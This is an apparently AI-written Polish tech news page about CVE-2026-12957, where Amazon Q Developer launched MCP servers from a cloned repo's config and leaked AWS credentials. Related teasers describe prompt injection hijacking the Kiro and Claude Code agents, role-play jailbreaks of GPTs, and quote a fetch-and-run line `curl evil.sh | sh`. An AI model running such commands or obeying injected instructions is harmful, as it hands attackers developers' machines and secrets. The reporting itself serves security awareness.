SmartDigest Tworzone przez AI, żeby nadążyć za AI
Zapisz się

Zapisz się do newslettera

Co tydzień najważniejsze newsy AI prosto na Twój e-mail. Wybierz tematy, które Cię interesują.

Premiera / Narzędzie

Amazon Q wykonywał kod ze sklonowanego repo, a nowa wersja MCP zrzuca bezpieczeństwo na ciebie

Wystarczyło sklonować repozytorium i otworzyć je w edytorze, by ktoś obcy przejął aktywną sesję chmurową dewelopera. Tak działała dziura CVE-2026-12957 w Amazon Q Developer: wtyczka odpalała serwery MCP opisane w pliku z repo bez pytania o zgodę, a procesy dziedziczyły klucze AWS i tokeny ofiary. Amazon załatał problem w wersji 1.69.0, ale ten sam wzorzec wcześniej trafił Claude Code, Cursora i Windsurfa. Zaplanowana na 28 lipca 2026 przebudowa MCP kasuje starą klasę ryzyk, lecz przenosi obowiązek pilnowania granic zaufania na piszącego serwer.

Napisała AI, żeby oszczędzić Ci czytania setek źródeł.  ·  Jak to działa

Premiera / Narzędzie  ·  5 min  · 

Amazon Q wykonywał kod ze sklonowanego repo, a nowa wersja MCP zrzuca bezpieczeństwo na ciebie
Ilustrację przygotowała AI.

Wystarczyło sklonować repozytorium i otworzyć je w edytorze, żeby ktoś obcy dostał aktywną sesję chmurową dewelopera. Tak działała dziura w Amazon Q Developer, wtyczce do programowania z pomocą AI od Amazona, którą opisał zespół Wiz Research. Oznaczona jako CVE-2026-12957 (CVSS 8,5), siedziała w tym, jak narzędzie obsługiwało serwery MCP.

MCP, czyli Model Context Protocol, pozwala asystentowi AI odpalić u ciebie lokalny proces i sięgnąć przez niego do bazy danych, zewnętrznego API albo narzędzi do budowania projektu. Anthropic ogłosił go pod koniec 2024 roku, a przez kolejne kilkanaście miesięcy podłączyli się pod niego OpenAI, Google i Microsoft, więc z inicjatywy jednej firmy zrobił się branżowy sposób spinania agentów ze światem. Cały sens MCP polega na tym, że redukuje liczbę osobnych integracji: zamiast pisać most między każdym modelem a każdym narzędziem osobno, robisz to raz po stronie protokołu. Założenie jest jedno: to ty świadomie konfigurujesz, który serwer wolno odpalić, bo dajesz asystentowi prawo do uruchamiania poleceń na twojej maszynie.

To założenie Amazon Q łamał. Wtyczka czytała plik .amazonq/mcp.json z otwartego katalogu roboczego i odpalała opisane w nim serwery od razu, bez pytania o zgodę i bez sprawdzenia, czy w ogóle ufasz temu projektowi. A że uruchomione procesy dziedziczyły całe środowisko dewelopera, dostawały też jego klucze AWS, tokeny logowania do chmury, sekrety API i gniazda agenta SSH. Złóż te dwie rzeczy razem i jeden plik podrzucony do repozytorium uruchamia dowolne polecenie z podpiętą żywą sesją chmurową. Bez hasła, bez drugiego logowania.

Czytaj dalej za darmo

Podaj e-mail, aby odblokować pełną treść i cały serwis. Zapiszemy Cię do newslettera.

Powiązane

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją Bezpieczeństwo

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją

4 min

Dwa tygodnie po raporcie OX Security dziura w MCP, pozwalająca wstawić `bash -c "curl evil.sh | sh"` w konfigurację STDIO, wciąż nie jest załatana — Anthropic nazwał to zachowaniem oczekiwanym. Klasyczne kontrole, EDR, DLP czy firewall, nie widzą ruchu między agentem a danymi, a badanie 14 904 GPT-ów pokazało, że 97% pada od odgrywania roli. Skoro agentowi nie można ufać, egzekucja polityki musi zejść do warstwy dostępu do danych. Z 11 katalogów MCP dziewięć przyjęło proof-of-concept OX bez weryfikacji.

Jeden piksel białego tekstu wystarczył, żeby przejąć maszynę dewelopera Bezpieczeństwo

Jeden piksel białego tekstu wystarczył, żeby przejąć maszynę dewelopera

4 min

Jeden piksel białego tekstu ukryty na zwykłej stronie z dokumentacją API wystarczył, żeby Kiro, agentowy edytor AWS, przepisał swój plik mcp.json i uruchomił obcy kod z uprawnieniami dewelopera. Intezer wraz z Kod Security pokazali, że nawet prośba o streszczenie strony mogła skończyć się zdalnym wykonaniem kodu, a okno zgody niczego nie zmieniało, bo konfiguracja i tak się przeładowywała. To już trzecie takie potknięcie Kiro, więc AWS oznaczył mcp.json, .vscode/tasks.json i katalog .git jako chronione ścieżki, wymagające wyraźnej zgody także w trybie autopilota.

Claude Code nigdy nie chciał otworzyć ci powłoki. Chciał naprawić błąd. Bezpieczeństwo

Claude Code nigdy nie chciał otworzyć ci powłoki. Chciał naprawić błąd.

4 min

Badacze z Mozilla 0DIN pokazali 27 czerwca atak, w którym Claude Code sam stawia atakującemu reverse shell na maszynie dewelopera, choć w sklonowanym repozytorium nie ma ani jednej złośliwej linijki. Łańcuch składa się z trzech nudnych z osobna elementów: czystego repo, paczki zwracającej błąd z podpowiedzią `python3 -m axiom init` oraz skryptu, który pobiera ładunek z rekordu DNS typu TXT i wykonuje go jako komendę. Agent ocenia komendę, którą widzi, a nie skutek schowany trzy kroki dalej, więc naprawiając błąd, oddaje klucze API. To na razie proof of concept, ale próg wejścia jest niski.